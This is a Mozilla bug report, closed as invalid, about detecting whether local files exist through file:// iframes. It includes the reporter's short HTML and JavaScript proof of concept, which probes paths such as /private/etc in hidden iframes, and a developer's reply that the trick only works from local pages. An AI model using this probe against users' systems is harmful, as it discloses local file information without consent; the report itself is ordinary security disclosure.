1347541 - Detection of arbitrary local files

Status: RESOLVED INVALID

(Core :: DOM: Core & HTML, defect)

Description

[junorouse]

Attachment: a.html

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Steps to reproduce:

I sent you an email. But I can't receive an email.

I can detect a local file. But only file:// protocol can. But chrome and many other browsers blocked this way.

I am macOs Sierra 10.12.3.

POC

------------------------------------

<iframe src="file:///private/etc/" style="display:none" id="d"></iframe>
<div id="x">
</div>

<script>

function go(e) {
document.getElementById('check').innerHTML = "no";
var d = document.getElementById('d');
var x = document.getElementById('x');
var c = d.cloneNode();
function file_onLoad() {
document.getElementById('check').innerHTML = "exist";
}
c.addEventListener('load', file_onLoad, false);
c.src="file://" + document.getElementById('ww').value;
x.appendChild(c);
}

</script>
<input type='text' value="/private/etc" id='ww' />

<input type='button' value="check" onclick='go(this)'/>
<div id="check">
</div>


Actual results:

Detect all local files existing. 

https://youtu.be/RWp4sEQE-H4


Expected results:

Can detect all local files.

Comment 2

[Daniel Veditz [:dveditz]]

This does not work when loaded from the web, only if loaded as a local file. There's currently no standard for how local files are treated, everything from "all file:// are same origin" to "each file:// is a separate origin". Chrome does the latter, we're somewhere in the middle.